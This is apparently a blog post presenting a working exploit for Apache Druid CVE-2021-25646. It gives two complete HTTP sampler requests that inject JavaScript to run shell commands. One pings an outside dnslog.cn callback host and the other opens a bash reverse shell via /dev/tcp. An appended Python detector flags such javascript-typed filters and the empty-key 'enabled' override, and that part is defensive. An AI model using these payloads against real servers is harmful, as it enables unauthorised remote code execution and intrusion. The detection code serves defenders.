Druid remote command execution (CVE-2021-25646)

Posted by ying-hack


Druid remote command execution

About Druid

Druid is a data store designed for high-performance slicing and OLAP analysis over large datasets. It is most often used as the data store powering GUI analytics applications, or as the backend for highly concurrent APIs that need fast aggregation.

Affected versions

Apache Druid < 0.20.1

Vulnerability overview

Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This feature is intended for high-trust environments and is disabled by default. However, in Druid 0.20.0 and earlier, an authenticated user can send a malicious request that exploits this vulnerability to execute arbitrary code.

Reproduction

  1. DNSLog

    POST /druid/indexer/v1/sampler HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/json
    Content-Length: 679
    Connection: close

    {
        "type": "index",
        "spec": {
            "type": "index",
            "ioConfig": {
                "type": "index",
                "firehose": {
                    "type": "local",
                    "baseDir": "quickstart/tutorial/",
                    "filter": "wikiticker-2015-09-12-sampled.json.gz"
                }
            },
            "dataSchema": {
                "dataSource": "sample",
                "parser": {
                    "type": "string",
                    "parseSpec": {
                        "format": "json",
                        "timestampSpec": {
                            "column": "time",
                            "format": "iso"
                        },
                        "dimensionsSpec": {}
                    }
                },
                "transformSpec": {
                    "transforms": [],
                    "filter": {
                        "type": "javascript",
                        "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')}",
                        "dimension": "added",
                        "": {
                            "enabled": "true"
                        }
                    }
                }
            }
        },
        "samplerConfig": {
            "numRows": 500,
            "timeoutMs": 15000,
            "cacheKey": "4ddb48fdbad7406084e37a1b80100214"
        }
    }

  2. Reverse shell

    POST /druid/indexer/v1/sampler HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/json
    Content-Length: 679
    Connection: close

    {
        "type": "index",
        "spec": {
            "type": "index",
            "ioConfig": {
                "type": "index",
                "firehose": {
                    "type": "local",
                    "baseDir": "quickstart/tutorial/",
                    "filter": "wikiticker-2015-09-12-sampled.json.gz"
                }
            },
            "dataSchema": {
                "dataSource": "sample",
                "parser": {
                    "type": "string",
                    "parseSpec": {
                        "format": "json",
                        "timestampSpec": {
                            "column": "time",
                            "format": "iso"
                        },
                        "dimensionsSpec": {}
                    }
                },
                "transformSpec": {
                    "transforms": [],
                    "filter": {
                        "type": "javascript",
                        "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}",
                        "dimension": "added",
                        "": {
                            "enabled": "true"
                        }
                    }
                }
            }
        },
        "samplerConfig": {
            "numRows": 500,
            "timeoutMs": 15000,
            "cacheKey": "4ddb48fdbad7406084e37a1b80100214"
        }
    }


A response status code of 200 indicates success.

This vulnerability can only be reproduced after authentication!!!
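As an added example (not from the original post), here is a small Python check a defender can run over `/druid/indexer/v1/sampler` request bodies captured at a reverse proxy or in an access log. It walks the whole ingestion spec and flags the two traits of the requests above: a `javascript`-typed spec element, and the empty-named key carrying `enabled` that the requests use to switch JavaScript on. The sample body is constructed here with a harmless function so the check runs offline.

```python
import json
from typing import Any, Iterator

# Constructed sample request body (not live traffic): same shape as the
# sampler requests shown above, but with a harmless JavaScript function.
SAMPLE_BODY = json.dumps({
    "type": "index",
    "spec": {
        "type": "index",
        "ioConfig": {"type": "index", "firehose": {"type": "local"}},
        "dataSchema": {
            "dataSource": "sample",
            "transformSpec": {
                "transforms": [],
                "filter": {
                    "type": "javascript",
                    "function": "function(value){return true}",
                    "dimension": "added",
                    "": {"enabled": "true"},
                },
            },
        },
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})

def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json-path, value) for every element of the document."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key or '<empty>'}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")

def findings(body: str) -> list[str]:
    """Return one reason per suspicious element found in a sampler body."""
    reasons = []
    for path, node in walk(json.loads(body)):
        if not isinstance(node, dict):
            continue
        if node.get("type") == "javascript":
            reasons.append(f"{path}: javascript-typed element, function={node.get('function')!r}")
        if isinstance(node.get(""), dict) and "enabled" in node[""]:
            reasons.append(f"{path}: empty-named key overriding 'enabled' (JS config override)")
    return reasons

def is_suspicious(body: str) -> bool:
    return bool(findings(body))

if __name__ == "__main__":
    for reason in findings(SAMPLE_BODY):
        print(reason)
```

Both checks fire on the constructed body; a body using an ordinary filter type (for example `selector`) produces no findings.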
